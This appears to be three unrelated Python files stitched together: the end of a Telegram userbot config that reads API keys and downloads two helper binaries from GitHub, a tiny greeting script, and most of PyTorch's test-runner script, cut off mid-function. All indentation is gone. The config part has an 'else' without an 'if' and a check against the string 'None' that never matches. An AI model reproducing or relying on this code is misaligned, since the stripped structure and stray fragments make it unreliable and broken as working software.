CLEAN_WELCOME = sb(os.environ.get("CLEAN_WELCOME", "True"))
# Custom Module
CUSTOM_PMPERMIT = os.environ.get("CUSTOM_PMPERMIT", None)
CUSTOM_STICKER_PACK_NAME = os.environ.get("CUSTOM_STICKER_PACK_NAME", None)
CUSTOM_ANIMATED_PACK_NAME = os.environ.get("CUSTOM_ANIMATED_PACK_NAME", None)
# Pm Permit Img
PMPERMIT_PIC = os.environ.get("PMPERMIT_PIC", None)
# Gban
USER_IS = os.environ.get("USER_IS", None)
# Last.fm Module
BIO_PREFIX = os.environ.get("BIO_PREFIX", None)
DEFAULT_BIO = os.environ.get("DEFAULT_BIO", None)
LASTFM_API = os.environ.get("LASTFM_API", None)
LASTFM_SECRET = os.environ.get("LASTFM_SECRET", None)
LASTFM_USERNAME = os.environ.get("LASTFM_USERNAME", None)
LASTFM_PASSWORD_PLAIN = os.environ.get("LASTFM_PASSWORD", None)
LASTFM_PASS = pylast.md5(LASTFM_PASSWORD_PLAIN)
if not LASTFM_USERNAME == "None":
lastfm = pylast.LastFMNetwork(api_key=LASTFM_API,
api_secret=LASTFM_SECRET,
username=LASTFM_USERNAME,
password_hash=LASTFM_PASS)
else:
lastfm = None
# Google Drive Module
G_DRIVE_CLIENT_ID = os.environ.get("G_DRIVE_CLIENT_ID", None)
G_DRIVE_CLIENT_SECRET = os.environ.get("G_DRIVE_CLIENT_SECRET", None)
G_DRIVE_AUTH_TOKEN_DATA = os.environ.get("G_DRIVE_AUTH_TOKEN_DATA", None)
GDRIVE_FOLDER_ID = os.environ.get("GDRIVE_FOLDER_ID", None)
TEMP_DOWNLOAD_DIRECTORY = os.environ.get("TEMP_DOWNLOAD_DIRECTORY",
"./downloads")
else:
# Put your ppe vars here if you are using local hosting
PLACEHOLDER = None
# Setting Up CloudMail.ru and MEGA.nz extractor binaries,
# and giving them correct perms to work properly.
if not os.path.exists('bin'):
os.mkdir('bin')
binaries = {
"https://raw.githubusercontent.com/yshalsager/megadown/master/megadown":
"bin/megadown",
"https://raw.githubusercontent.com/yshalsager/cmrudl.py/master/cmrudl.py":
"bin/cmrudl"
}
for binary, path in binaries.items():
downloader = SmartDL(binary, path, progress_bar=False)
downloader.start()
os.chmod(path, 0o755)
# Global Variables
COUNT_MSG = 0
USERS = {}
COUNT_PM = {}
LASTMSG = {}
CMD_HELP = {}
SUDO_LIST = {}
ISAFK = False
AFKREASON = None
|
#!/usr/bin/env python3
import sys
assert sys.version_info >= (3,9), "This script requires at least Python 3.9"
print("Hello, World!")
print("I would like to get to know you.")
n = input("What is your name? ")
if n == "Jason":
print("What do I need to do to get an A?")
elif n == "Bob":
print("I've got a bad feeling about you.")
else:
print("I am glad to meet you, {}".format(n))
|
#!/usr/bin/env python3
import argparse
import copy
from datetime import datetime
import json
import modulefinder
import os
import shutil
import signal
import subprocess
import sys
import tempfile
import torch
from torch.utils import cpp_extension
from torch.testing._internal.common_utils import TEST_WITH_ROCM, shell, set_cwd, FILE_SCHEMA
from torch.testing._internal.framework_utils import calculate_shards
import torch.distributed as dist
from typing import Dict, Optional, Tuple, List, Any
from typing_extensions import TypedDict
try:
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), ".."))
from tools.stats_utils.s3_stat_parser import (get_previous_reports_for_branch, Report, HAVE_BOTO3)
except ImportError:
print("Unable to import s3_stat_parser from tools. Running without S3 stats...")
HAVE_BOTO3 = False
TESTS = [
'test_import_time',
'test_public_bindings',
'test_type_hints',
'test_autograd',
'benchmark_utils/test_benchmark_utils',
'test_binary_ufuncs',
'test_bundled_inputs',
'test_complex',
'test_cpp_api_parity',
'test_cpp_extensions_aot_no_ninja',
'test_cpp_extensions_aot_ninja',
'test_cpp_extensions_jit',
'distributed/test_c10d_common',
'distributed/test_c10d_gloo',
'distributed/test_c10d_nccl',
'distributed/test_jit_c10d',
'distributed/test_c10d_spawn_gloo',
'distributed/test_c10d_spawn_nccl',
'test_cuda',
'test_jit_cuda_fuser',
'test_cuda_primary_ctx',
'test_dataloader',
'test_datapipe',
'distributed/test_data_parallel',
'distributed/test_distributed_fork',
'distributed/test_distributed_spawn',
'distributions/test_constraints',
'distributions/test_distributions',
'test_dispatch',
'test_expecttest',
'test_foreach',
'test_indexing',
'test_jit',
'test_linalg',
'test_logging',
'test_mkldnn',
'test_model_dump',
'test_module_init',
'test_multiprocessing',
'test_multiprocessing_spawn',
'distributed/test_nccl',
'test_native_functions',
'test_numba_integration',
'test_nn',
'test_ops',
'test_optim',
'test_pytree',
'test_mobile_optimizer',
'test_set_default_mobile_cpu_allocator',
'test_xnnpack_integration',
'test_vulkan',
'test_sparse',
'test_sparse_csr',
'test_quantization',
'test_pruning_op',
'test_spectral_ops',
'test_serialization',
'test_shape_ops',
'test_show_pickle',
'test_sort_and_select',
'test_tensor_creation_ops',
'test_testing',
'test_torch',
'test_type_info',
'test_unary_ufuncs',
'test_utils',
'test_view_ops',
'test_vmap',
'test_namedtuple_return_api',
'test_numpy_interop',
'test_jit_profiling',
'test_jit_legacy',
'test_jit_fuser_legacy',
'test_tensorboard',
'test_namedtensor',
'test_reductions',
'test_type_promotion',
'test_jit_disabled',
'test_function_schema',
'test_op_aliases',
'test_overrides',
'test_jit_fuser_te',
'test_tensorexpr',
'test_tensorexpr_pybind',
'test_openmp',
'test_profiler',
"distributed/test_launcher",
'distributed/nn/jit/test_instantiator',
'distributed/rpc/test_faulty_agent',
'distributed/rpc/test_process_group_agent',
'distributed/rpc/cuda/test_process_group_agent',
'distributed/rpc/test_tensorpipe_agent',
'distributed/rpc/cuda/test_tensorpipe_agent',
'test_determination',
'test_futures',
'test_fx',
'test_fx_experimental',
'test_functional_autograd_benchmark',
'test_package',
'test_license',
'distributed/pipeline/sync/skip/test_api',
'distributed/pipeline/sync/skip/test_gpipe',
'distributed/pipeline/sync/skip/test_inspect_skip_layout',
'distributed/pipeline/sync/skip/test_leak',
'distributed/pipeline/sync/skip/test_portal',
'distributed/pipeline/sync/skip/test_stash_pop',
'distributed/pipeline/sync/skip/test_tracker',
'distributed/pipeline/sync/skip/test_verify_skippables',
'distributed/pipeline/sync/test_balance',
'distributed/pipeline/sync/test_bugs',
'distributed/pipeline/sync/test_checkpoint',
'distributed/pipeline/sync/test_copy',
'distributed/pipeline/sync/test_deferred_batch_norm',
'distributed/pipeline/sync/test_dependency',
'distributed/pipeline/sync/test_inplace',
'distributed/pipeline/sync/test_microbatch',
'distributed/pipeline/sync/test_phony',
'distributed/pipeline/sync/test_pipe',
'distributed/pipeline/sync/test_pipeline',
'distributed/pipeline/sync/test_stream',
'distributed/pipeline/sync/test_transparency',
'distributed/pipeline/sync/test_worker',
'distributed/optim/test_zero_redundancy_optimizer',
'distributed/elastic/timer/api_test',
'distributed/elastic/timer/local_timer_example',
'distributed/elastic/timer/local_timer_test',
'distributed/elastic/events/lib_test',
'distributed/elastic/metrics/api_test',
'distributed/elastic/utils/logging_test',
'distributed/elastic/utils/util_test',
'distributed/elastic/utils/distributed_test',
'distributed/elastic/multiprocessing/api_test',
]
# Tests need to be run with pytest.
USE_PYTEST_LIST = [
'distributed/pipeline/sync/skip/test_api',
'distributed/pipeline/sync/skip/test_gpipe',
'distributed/pipeline/sync/skip/test_inspect_skip_layout',
'distributed/pipeline/sync/skip/test_leak',
'distributed/pipeline/sync/skip/test_portal',
'distributed/pipeline/sync/skip/test_stash_pop',
'distributed/pipeline/sync/skip/test_tracker',
'distributed/pipeline/sync/skip/test_verify_skippables',
'distributed/pipeline/sync/test_balance',
'distributed/pipeline/sync/test_bugs',
'distributed/pipeline/sync/test_checkpoint',
'distributed/pipeline/sync/test_copy',
'distributed/pipeline/sync/test_deferred_batch_norm',
'distributed/pipeline/sync/test_dependency',
'distributed/pipeline/sync/test_inplace',
'distributed/pipeline/sync/test_microbatch',
'distributed/pipeline/sync/test_phony',
'distributed/pipeline/sync/test_pipe',
'distributed/pipeline/sync/test_pipeline',
'distributed/pipeline/sync/test_stream',
'distributed/pipeline/sync/test_transparency',
'distributed/pipeline/sync/test_worker',
'distributions/test_constraints',
'distributions/test_transforms',
'distributions/test_utils',
'test_typing',
"distributed/elastic/events/lib_test",
"distributed/elastic/agent/server/test/api_test",
]
WINDOWS_BLOCKLIST = [
'distributed/nn/jit/test_instantiator',
'distributed/rpc/test_faulty_agent',
'distributed/rpc/test_process_group_agent',
'distributed/rpc/cuda/test_process_group_agent',
'distributed/rpc/test_tensorpipe_agent',
'distributed/rpc/cuda/test_tensorpipe_agent',
'distributed/test_distributed_fork',
'distributed/pipeline/sync/skip/test_api',
'distributed/pipeline/sync/skip/test_gpipe',
'distributed/pipeline/sync/skip/test_inspect_skip_layout',
'distributed/pipeline/sync/skip/test_leak',
'distributed/pipeline/sync/skip/test_portal',
'distributed/pipeline/sync/skip/test_stash_pop',
'distributed/pipeline/sync/skip/test_tracker',
'distributed/pipeline/sync/skip/test_verify_skippables',
'distributed/pipeline/sync/test_balance',
'distributed/pipeline/sync/test_bugs',
'distributed/pipeline/sync/test_checkpoint',
'distributed/pipeline/sync/test_copy',
'distributed/pipeline/sync/test_deferred_batch_norm',
'distributed/pipeline/sync/test_dependency',
'distributed/pipeline/sync/test_inplace',
'distributed/pipeline/sync/test_microbatch',
'distributed/pipeline/sync/test_phony',
'distributed/pipeline/sync/test_pipe',
'distributed/pipeline/sync/test_pipeline',
'distributed/pipeline/sync/test_stream',
'distributed/pipeline/sync/test_transparency',
'distributed/pipeline/sync/test_worker',
'distributed/optim/test_zero_redundancy_optimizer',
"distributed/elastic/agent/server/test/api_test",
'distributed/elastic/multiprocessing/api_test',
]
ROCM_BLOCKLIST = [
'distributed/nn/jit/test_instantiator',
'distributed/rpc/test_faulty_agent',
'distributed/rpc/test_process_group_agent',
'distributed/rpc/cuda/test_process_group_agent',
'distributed/rpc/test_tensorpipe_agent',
'distributed/rpc/cuda/test_tensorpipe_agent',
'test_determination',
'test_multiprocessing',
'test_jit_legacy',
'test_type_hints',
'test_openmp',
]
RUN_PARALLEL_BLOCKLIST = [
'test_cpp_extensions_jit',
'test_expecttest',
'test_jit_disabled',
'test_mobile_optimizer',
'test_multiprocessing',
'test_multiprocessing_spawn',
'test_namedtuple_return_api',
'test_overrides',
'test_show_pickle',
'test_tensorexpr',
'test_cuda_primary_ctx',
] + [test for test in TESTS if test.startswith('distributed/')]
WINDOWS_COVERAGE_BLOCKLIST = [
]
# These tests are slow enough that it's worth calculating whether the patch
# touched any related files first. This list was manually generated, but for every
# run with --determine-from, we use another generated list based on this one and the
# previous test stats.
TARGET_DET_LIST = [
'distributions/test_distributions',
'test_nn',
'test_autograd',
'test_cpp_extensions_jit',
'test_jit_legacy',
'test_dataloader',
'test_overrides',
'test_linalg',
'test_jit',
'test_jit_profiling',
'test_torch',
'test_binary_ufuncs',
'test_numpy_interop',
'test_reductions',
'test_shape_ops',
'test_sort_and_select',
'test_testing',
'test_view_ops',
'distributed/nn/jit/test_instantiator',
'distributed/test_distributed_fork',
'distributed/rpc/test_process_group_agent',
'distributed/rpc/cuda/test_process_group_agent',
'distributed/rpc/test_tensorpipe_agent',
'distributed/rpc/cuda/test_tensorpipe_agent',
'distributed/algorithms/ddp_comm_hooks/test_ddp_hooks',
'distributed/test_distributed_spawn',
'test_cuda',
'test_cuda_primary_ctx',
'test_cpp_extensions_aot_ninja',
'test_cpp_extensions_aot_no_ninja',
'test_serialization',
'test_optim',
'test_utils',
'test_multiprocessing',
'test_tensorboard',
'distributed/test_c10d_common',
'distributed/test_c10d_gloo',
'distributed/test_c10d_nccl',
'distributed/test_jit_c10d',
'distributed/test_c10d_spawn_gloo',
'distributed/test_c10d_spawn_nccl',
'test_quantization',
'test_pruning_op',
'test_determination',
'test_futures',
'distributed/pipeline/sync/skip/test_api',
'distributed/pipeline/sync/skip/test_gpipe',
'distributed/pipeline/sync/skip/test_inspect_skip_layout',
'distributed/pipeline/sync/skip/test_leak',
'distributed/pipeline/sync/skip/test_portal',
'distributed/pipeline/sync/skip/test_stash_pop',
'distributed/pipeline/sync/skip/test_tracker',
'distributed/pipeline/sync/skip/test_verify_skippables',
'distributed/pipeline/sync/test_balance',
'distributed/pipeline/sync/test_bugs',
'distributed/pipeline/sync/test_checkpoint',
'distributed/pipeline/sync/test_copy',
'distributed/pipeline/sync/test_deferred_batch_norm',
'distributed/pipeline/sync/test_dependency',
'distributed/pipeline/sync/test_inplace',
'distributed/pipeline/sync/test_microbatch',
'distributed/pipeline/sync/test_phony',
'distributed/pipeline/sync/test_pipe',
'distributed/pipeline/sync/test_pipeline',
'distributed/pipeline/sync/test_stream',
'distributed/pipeline/sync/test_transparency',
'distributed/pipeline/sync/test_worker',
]
# the JSON file to store the S3 test stats
TEST_TIMES_FILE = '.pytorch-test-times'
# if a test file takes longer than 5 min, we add it to TARGET_DET_LIST
SLOW_TEST_THRESHOLD = 300
_DEP_MODULES_CACHE: Dict[str, set] = {}
DISTRIBUTED_TESTS_CONFIG = {}
if dist.is_available():
DISTRIBUTED_TESTS_CONFIG['test'] = {
'WORLD_SIZE': '1'
}
if not TEST_WITH_ROCM and dist.is_mpi_available():
DISTRIBUTED_TESTS_CONFIG['mpi'] = {
'WORLD_SIZE': '3',
'TEST_REPORT_SOURCE_OVERRIDE': 'dist-mpi'
}
if dist.is_nccl_available():
DISTRIBUTED_TESTS_CONFIG['nccl'] = {
'WORLD_SIZE': '2' if torch.cuda.device_count() == 2 else '3',
'TEST_REPORT_SOURCE_OVERRIDE': 'dist-nccl'
}
if dist.is_gloo_available():
DISTRIBUTED_TESTS_CONFIG['gloo'] = {
'WORLD_SIZE': '2' if torch.cuda.device_count() == 2 else '3',
'TEST_REPORT_SOURCE_OVERRIDE': 'dist-gloo'
}
# https://stackoverflow.com/questions/2549939/get-signal-names-from-numbers-in-python
SIGNALS_TO_NAMES_DICT = {getattr(signal, n): n for n in dir(signal)
if n.startswith('SIG') and '_' not in n}
CPP_EXTENSIONS_ERROR = """
Ninja (https://ninja-build.org) is required for some of the C++ extensions
tests, but it could not be found. Install ninja with `pip install ninja`
or `conda install ninja`. Alternatively, disable said tests with
`run_test.py --exclude test_cpp_extensions_aot_ninja test_cpp_extensions_jit`.
"""
PYTORCH_COLLECT_COVERAGE = bool(os.environ.get("PYTORCH_COLLECT_COVERAGE"))
JIT_EXECUTOR_TESTS = [
'test_jit_cuda_fuser',
'test_jit_profiling',
'test_jit_legacy',
'test_jit_fuser_legacy',
]
def print_to_stderr(message):
print(message, file=sys.stderr)
# Convert something like pytorch_windows_vs2019_py36_cuda10.1_build to pytorch_windows_vs2019_py36_cuda10.1
def get_stripped_CI_job() -> str:
job = os.environ.get("CIRCLE_JOB", "").rstrip('0123456789')
if job.endswith('_slow_test'):
job = job[:len(job) - len('_slow_test')]
elif job.endswith('_test'):
job = job[:len(job) - len('_test')]
elif job.endswith('_build'):
job = job[:len(job) - len('_build')]
return job
def calculate_job_times(reports: List["Report"]) -> Dict[str, float]:
# an entry will be like ("test_file_name" -> (current_avg, # values))
jobs_to_times: Dict[str, Tuple[float, int]] = dict()
for report in reports:
assert report.get('format_version') == 2, "S3 format currently handled is version 2 only"
files: Dict[str, Any] = report['files']
for name, test_file in files.items():
if name not in jobs_to_times:
jobs_to_times[name] = (test_file['total_seconds'], 1)
else:
curr_avg, curr_count = jobs_to_times[name]
new_count = curr_count + 1
new_avg = (curr_avg * curr_count + test_file['total_seconds']) / new_count
jobs_to_times[name] = (new_avg, new_count)
# if there's 'test_cpp_extensions_aot' entry in jobs_to_times, add 'test_cpp_extensions_aot_ninja'
# and 'test_cpp_extensions_aot_no_ninja' duplicate entries to ease future computation since
# test_cpp_extensions_aot_no_ninja and test_cpp_extensions_aot_ninja are Python test jobs that
# both use the test_cpp_extensions_aot.py file.
if 'test_cpp_extensions_aot' in jobs_to_times:
jobs_to_times['test_cpp_extensions_aot_ninja'] = jobs_to_times['test_cpp_extensions_aot']
jobs_to_times['test_cpp_extensions_aot_no_ninja'] = jobs_to_times['test_cpp_extensions_aot']
return {job: time for job, (time, _) in jobs_to_times.items()}
def pull_job_times_from_S3() -> Dict[str, float]:
if HAVE_BOTO3:
ci_job_prefix = get_stripped_CI_job()
s3_reports: List["Report"] = get_previous_reports_for_branch('origin/nightly', ci_job_prefix)
else:
print('Uh oh, boto3 is not found. Either it is not installed or we failed to import s3_stat_parser.')
print('If not installed, please install boto3 for automatic sharding and test categorization.')
s3_reports = []
if len(s3_reports) == 0:
print('Gathered no reports from S3. Please proceed without them.')
return dict()
return calculate_job_times(s3_reports)
def get_past_job_times() -> Dict[str, float]:
if os.path.exists(TEST_TIMES_FILE):
with open(TEST_TIMES_FILE) as file:
test_times_json: JobTimeJSON = json.load(file)
curr_commit = subprocess.check_output(['git', 'rev-parse', 'HEAD'], encoding="ascii").strip()
file_commit = test_times_json.get('commit', '')
curr_ci_job = get_stripped_CI_job()
file_ci_job = test_times_json.get('CIRCLE_JOB', 'N/A')
if curr_commit != file_commit:
print(f'Current test times file is from different commit {file_commit}.')
elif curr_ci_job != file_ci_job:
print(f'Current test times file is for different CI job {file_ci_job}.')
else:
print(f'Found stats for current commit: {curr_commit} and job: {curr_ci_job}. Proceeding with those values.')
return test_times_json.get('job_times', {})
# Found file, but commit or CI job in JSON doesn't match
print(f'Overwriting current file with stats based on current commit: {curr_commit} and CI job: {curr_ci_job}')
job_times = pull_job_times_from_S3()
print(f'Exporting S3 test stats to {TEST_TIMES_FILE}.')
export_S3_test_times(TEST_TIMES_FILE, job_times)
return job_times
class JobTimeJSON(TypedDict):
commit: str
job_times: Dict[str, float]
def get_job_times_json(job_times: Dict[str, float]) -> JobTimeJSON:
return {
'commit': subprocess.check_output(['git', 'rev-parse', 'HEAD'], encoding="ascii").strip(),
'CIRCLE_JOB': get_stripped_CI_job(),
'job_times': job_times,
}
def get_shard(which_shard: int, num_shards: int, tests: List[str]) -> List[str]:
jobs_to_times = get_past_job_times()
# Got no stats from S3, returning early to save runtime
if len(jobs_to_times) == 0:
print('Gathered no stats from S3. Proceeding with default sharding plan.')
return tests[which_shard - 1 :: num_shards]
shards = calculate_shards(num_shards, tests, jobs_to_times)
_, tests_from_shard = shards[which_shard - 1]
return tests_from_shard
def get_slow_tests_based_on_S3() -> List[str]:
jobs_to_times: Dict[str, float] = get_past_job_times()
# Got no stats from S3, returning early to save runtime
if len(jobs_to_times) == 0:
print('Gathered no stats from S3. No new slow tests calculated.')
return []
slow_tests: List[str] = []
for test in TESTS:
if test in jobs_to_times and test not in TARGET_DET_LIST:
if jobs_to_times[test] > SLOW_TEST_THRESHOLD:
slow_tests.append(test)
return slow_tests
def get_executable_command(options, allow_pytest, disable_coverage=False):
if options.coverage and not disable_coverage:
executable = ['coverage', 'run', '--parallel-mode', '--source=torch']
else:
executable = [sys.executable]
if options.pytest:
if allow_pytest:
executable += ['-m', 'pytest']
else:
print_to_stderr('Pytest cannot be used for this test. Falling back to unittest.')
return executable
def run_test(test_module, test_directory, options, launcher_cmd=None, extra_unittest_args=None):
unittest_args = options.additional_unittest_args.copy()
if options.verbose:
unittest_args.append(f'-{"v"*options.verbose}') # in case of pytest
if test_module in RUN_PARALLEL_BLOCKLIST:
unittest_args = [arg for arg in unittest_args if not arg.startswith('--run-parallel')]
if extra_unittest_args:
assert isinstance(extra_unittest_args, list)
unittest_args.extend(extra_unittest_args)
# If using pytest, replace -f with equivalent -x
if options.pytest:
unittest_args = [arg if arg != '-f' else '-x' for arg in unittest_args]
# Can't call `python -m unittest test_*` here because it doesn't run code
# in `if __name__ == '__main__': `. So call `python test_*.py` instead.
argv = [test_module + '.py'] + unittest_args
# Multiprocessing related tests cannot run with coverage.
# Tracking issue: https://github.com/pytorch/pytorch/issues/50661
disable_coverage = sys.platform == 'win32' and test_module in WINDOWS_COVERAGE_BLOCKLIST
# Extra arguments are not supported with pytest
executable = get_executable_command(options, allow_pytest=not extra_unittest_args,
disable_coverage=disable_coverage)
command = (launcher_cmd or []) + executable + argv
print_to_stderr('Executing {} ... [{}]'.format(command, datetime.now()))
return shell(command, test_directory)
def test_cuda_primary_ctx(test_module, test_directory, options):
return run_test(test_module, test_directory, options, extra_unittest_args=['--subprocess'])
def _test_cpp_extensions_aot(test_module, test_directory, options, use_ninja):
if use_ninja:
try:
cpp_extension.verify_ninja_availability()
except RuntimeError:
print(CPP_EXTENSIONS_ERROR)
return 1
# Wipe the build folder, if it exists already
cpp_extensions_test_dir = os.path.join(test_directory, 'cpp_extensions')
cpp_extensions_test_build_dir = os.path.join(cpp_extensions_test_dir, 'build')
if os.path.exists(cpp_extensions_test_build_dir):
shutil.rmtree(cpp_extensions_test_build_dir)
# Build the test cpp extensions modules
shell_env = os.environ.copy()
shell_env['USE_NINJA'] = str(1 if use_ninja else 0)
cmd = [sys.executable, 'setup.py', 'install', '--root', './install']
return_code = shell(cmd, cwd=cpp_extensions_test_dir, env=shell_env)
if return_code != 0:
return return_code
if sys.platform != 'win32':
return_code = shell(cmd,
cwd=os.path.join(cpp_extensions_test_dir, 'no_python_abi_suffix_test'),
env=shell_env)
if return_code != 0:
return return_code
# "install" the test modules and run tests
python_path = os.environ.get('PYTHONPATH', '')
try:
cpp_extensions = os.path.join(test_directory, 'cpp_extensions')
install_directory = ''
# install directory is the one that is named site-packages
for root, directories, _ in os.walk(os.path.join(cpp_extensions, 'install')):
for directory in directories:
if '-packages' in directory:
install_directory = os.path.join(root, directory)
assert install_directory, 'install_directory must not be empty'
os.environ['PYTHONPATH'] = os.pathsep.join([install_directory, python_path])
return run_test(test_module, test_directory, options)
finally:
os.environ['PYTHONPATH'] = python_path
def test_cpp_extensions_aot_ninja(test_module, test_directory, options):
return _test_cpp_extensions_aot('test_cpp_extensions_aot', test_directory,
options, use_ninja=True)
def test_cpp_extensions_aot_no_ninja(test_module, test_directory, options):
return _test_cpp_extensions_aot('test_cpp_extensions_aot',
test_directory, options, use_ninja=False)
def test_distributed(test_module, test_directory, options):
# MPI tests are broken with Python-3.9
mpi_available = subprocess.call('command -v mpiexec', shell=True) == 0 and sys.version_info < (3, 9)
if options.verbose and not mpi_available:
print_to_stderr(
'MPI not available -- MPI backend tests will be skipped')
config = DISTRIBUTED_TESTS_CONFIG
for backend, env_vars in config.items():
if sys.platform == 'win32' and backend != 'gloo':
continue
if backend == 'mpi' and not mpi_available:
continue
for with_init_file in {True, False}:
if sys.platform == 'win32' and not with_init_file:
continue
tmp_dir = tempfile.mkdtemp()
if options.verbose:
init_str = "with {} init_method"
with_init = init_str.format("file" if with_init_file else "env")
print_to_stderr(
'Running distributed tests for the {} backend {}'.format(
backend, with_init))
os.environ['TEMP_DIR'] = tmp_dir
os.environ['BACKEND'] = backend
os.environ['INIT_METHOD'] = 'env://'
os.environ.update(env_vars)
if with_init_file:
if test_module in ["test_distributed_fork", "test_distributed_spawn"]:
init_method = f'{FILE_SCHEMA}{tmp_dir}/'
else:
init_method = f'{FILE_SCHEMA}{tmp_dir}/shared_init_file'
os.environ['INIT_METHOD'] = init_method
try:
os.mkdir(os.path.join(tmp_dir, 'barrier'))
os.mkdir(os.path.join(tmp_dir, 'test_dir'))
if backend == 'mpi':
# test mpiexec for --noprefix option
with open(os.devnull, 'w') as devnull:
allowrunasroot_opt = '--allow-run-as-root' if subprocess.call(
'mpiexec --allow-run-as-root -n 1 bash -c ""', shell=True,
stdout=devnull, stderr=subprocess.STDOUT) == 0 else ''
noprefix_opt = '--noprefix' if subprocess.call(
f'mpiexec {allowrunasroot_opt} -n 1 --noprefix bash -c ""', shell=True,
stdout=devnull, stderr=subprocess.STDOUT) == 0 else ''
mpiexec = ['mpiexec', '-n', '3', noprefix_opt, allowrunasroot_opt]
return_code = run_test(test_module, test_directory, options,
launcher_cmd=mpiexec)
else:
return_code = run_test(test_module, test_directory, options)
if return_code != 0:
return return_code
finally:
shutil.rmtree(tmp_dir)
return 0
CUSTOM_HANDLERS = {
'test_cuda_primary_ctx': test_cuda_primary_ctx,
'test_cpp_extensions_aot_no_ninja': test_cpp_extensions_aot_no_ninja,
'test_cpp_extensions_aot_ninja': test_cpp_extensions_aot_ninja,
'distributed/test_distributed_fork': test_distributed,
'distributed/test_distributed_spawn': test_distributed,
}
def parse_test_module(test):
return test.split('.')[0]
class TestChoices(list):
def __init__(self, *args, **kwargs):
super(TestChoices, self).__init__(args[0])
def __contains__(self, item):
return list.__contains__(self, parse_test_module(item))
def parse_args():
parser = argparse.ArgumentParser(
description='Run the PyTorch unit test suite',
epilog='where TESTS is any of: {}'.format(', '.join(TESTS)))
parser.add_argument(
'-v',
'--verbose',
action='count',
default=0,
help='print verbose information and test-by-test results')
parser.add_argument(
'--jit',
'--jit',
action='store_true',
help='run all jit tests')
parser.add_argument(
'-pt', '--pytest', action='store_true',
help='If true, use `pytest` to execute the tests. E.g., this runs '
'TestTorch with pytest in verbose and coverage mode: '
'python run_test.py -vci torch -pt')
parser.add_argument(
'-c', '--coverage', action='store_true', help='enable coverage',
default=PYTORCH_COLLECT_COVERAGE)
parser.add_argument(
'-i',
'--include',
nargs='+',
choices=TestChoices(TESTS),
default=TESTS,
metavar='TESTS',
help='select a set of tests to include (defaults to ALL tests).'
' tests can be specified with module name, module.TestClass'
' or module.TestClass.test_method')
parser.add_argument(
'-x',
'--exclude',
nargs='+',
choices=TESTS,
metavar='TESTS',
default=[],
help='select a set of tests to exclude')
parser.add_argument(
'-f',
'--first',
choices=TESTS,
metavar='TESTS',
help='select the test to start from (excludes previous tests)')
parser.add_argument(
'-l',
'--last',
choices=TESTS,
metavar='TESTS',
help='select the last test to run (excludes following tests)')
parser.add_argument(
'--bring-to-front',
nargs='+',
choices=TestChoices(TESTS),
default=[],
metavar='TESTS',
help='select a set of tests to run first. This can be used in situations'
' where you want to run all tests, but care more about some set, '
'e.g. after making a change to a specific component')
parser.add_argument(
'--ignore-win-blocklist',
action='store_true',
help='always run blocklisted windows tests')
parser.add_argument(
'--determine-from',
help='File of affected source filenames to determine which tests to run.')
parser.add_argument(
'--continue-through-error',
action='store_true',
help='Runs the full test suite despite one of the tests failing')
parser.add_argument(
'additional_unittest_args',
nargs='*',
help='additional arguments passed through to unittest, e.g., '
'python run_test.py -i sparse -- TestSparse.test_factory_size_check')
parser.add_argument(
'--export-past-test-times',
nargs='?',
type=str,
const=TEST_TIMES_FILE,
help='dumps test times from previous S3 stats into a file, format JSON',
)
parser.add_argument(
'--shard',
nargs=2,
type=int,
help='runs a shard of the tests (taking into account other selections), e.g., '
'--shard 2 3 will break up the selected tests into 3 shards and run the tests '
'in the 2nd shard (the first number should not exceed the second)',
)
parser.add_argument(
'--exclude-jit-executor',
action='store_true',
help='exclude tests that are run for a specific jit config'
)
return parser.parse_args()
def find_test_index(test, selected_tests, find_last_index=False):
"""Find the index of the first or last occurrence of a given test/test module in the list of selected tests.
This function is used to determine the indices when slicing the list of selected tests when
``options.first``(:attr:`find_last_index`=False) and/or ``options.last``(:attr:`find_last_index`=True) are used.
:attr:`selected_tests` can be a list that contains multiple consequent occurrences of tests
as part of the same test module, e.g.:
```
selected_tests = ['autograd', 'cuda', **'torch.TestTorch.test_acos',
'torch.TestTorch.test_tan', 'torch.TestTorch.test_add'**, 'utils']
```
If :attr:`test`='torch' and :attr:`find_last_index`=False, result should be **2**.
If :attr:`test`='torch' and :attr:`find_last_index`=True, result should be **4**.
Args:
test (str): Name of test to lookup
selected_tests (list): List of tests
find_last_index (bool, optional): should we lookup the index of first or last
occurrence (first is default)
Returns:
index of the first or last occurrence of the given test
"""
idx = 0
found_idx = -1
for t in selected_tests:
if t.startswith(test):
found_idx = idx
if not find_last_index:
break
idx += 1
return found_idx
def exclude_tests(exclude_list, selected_tests, exclude_message=None):
for exclude_test in exclude_list:
tests_copy = selected_tests[:]
for test in tests_copy:
if test.startswith(exclude_test):
if exclude_message is not None:
print_to_stderr('Excluding {} {}'.format(test, exclude_message))
selected_tests.remove(test)
return selected_tests
def get_selected_tests(options):
selected_tests = options.include
if options.bring_to_front:
to_front = set(options.bring_to_front)
selected_tests = options.bring_to_front + list(filter(lambda name: name not in to_front,
selected_tests))
if options.first:
first_index = find_test_index(options.first, selected_tests)
selected_tests = selected_tests[first_index:]
if options.last:
last_index = find_test_index(options.last, selected_tests, find_last_index=True)
selected_tests = selected_tests[:last_index + 1]
if options.shard:
assert len(options.shard) == 2, "Unexpected shard format"
assert min(options.shard) > 0, "Shards must be positive numbers"
which_shard, num_shards = options.shard
assert which_shard <= num_shards, "Selected shard must be less or equal that total number of shards"
assert num_shards <= len(selected_tests), f"Number of shards must be less than {len(selected_tests)}"
selected_tests = get_shard(which_shard, num_shards, selected_tests)
if options.exclude_jit_executor:
options.exclude.extend(JIT_EXECUTOR_TESTS)
selected_tests = exclude_tests(options.exclude, selected_tests)
if sys.platform == 'win32' and not options.ignore_win_blocklist:
target_arch = os.environ.get('VSCMD_ARG_TGT_ARCH')
if target_arch != 'x64':
WINDOWS_BLOCKLIST.append('cpp_extensions_aot_no_ninja')
WINDOWS_BLOCKLIST.append('cpp_extensions_aot_ninja')
WINDOWS_BLOCKLIST.append('cpp_extensions_jit')
WINDOWS_BLOCKLIST.append('jit')
WINDOWS_BLOCKLIST.append('jit_fuser')
selected_tests = exclude_tests(WINDOWS_BLOCKLIST, selected_tests, 'on Windows')
elif TEST_WITH_ROCM:
selected_tests = exclude_tests(ROCM_BLOCKLIST, selected_tests, 'on ROCm')
return selected_tests
def test_impact_of_file(filename):
"""Determine what class of impact this file has on test runs.
Possible values:
TORCH - torch python code
CAFFE2 - caffe2 python code
TEST - torch test code
UNKNOWN - may affect all tests
NONE - known to have no effect on test outcome
CI - CI configuration files
"""
parts = filename.split(os.sep)
if parts[0] in ['.jenkins', '.circleci']:
return 'CI'
